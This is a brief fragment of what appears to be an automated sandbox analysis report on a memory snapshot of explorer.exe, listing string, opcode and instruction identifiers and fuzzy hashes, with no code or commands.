                                  • Snapshot File: hcaresult_11_2_7ff8476e0000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Xd]G$Xd]G$d]G$d]G
                                  • API String ID: 0-3376394805
                                  • Opcode ID: 38438253303b48adb642b552d862a5d75fc5d5eccac11ab28afde0971de7c478
                                  • Instruction ID: c971c9d9c1186d56c679d81e3c4fe26056a05e646827f60c0f9df5aa49993f55
                                  • Opcode Fuzzy Hash: 38438253303b48adb642b552d862a5d75fc5d5eccac11ab28afde0971de7c478
                                  • Instruction Fuzzy Hash: A811E792D0E5C2AFFE65957C38450BD1F92FF41AA472C45FBE0884B8DBE85C98074260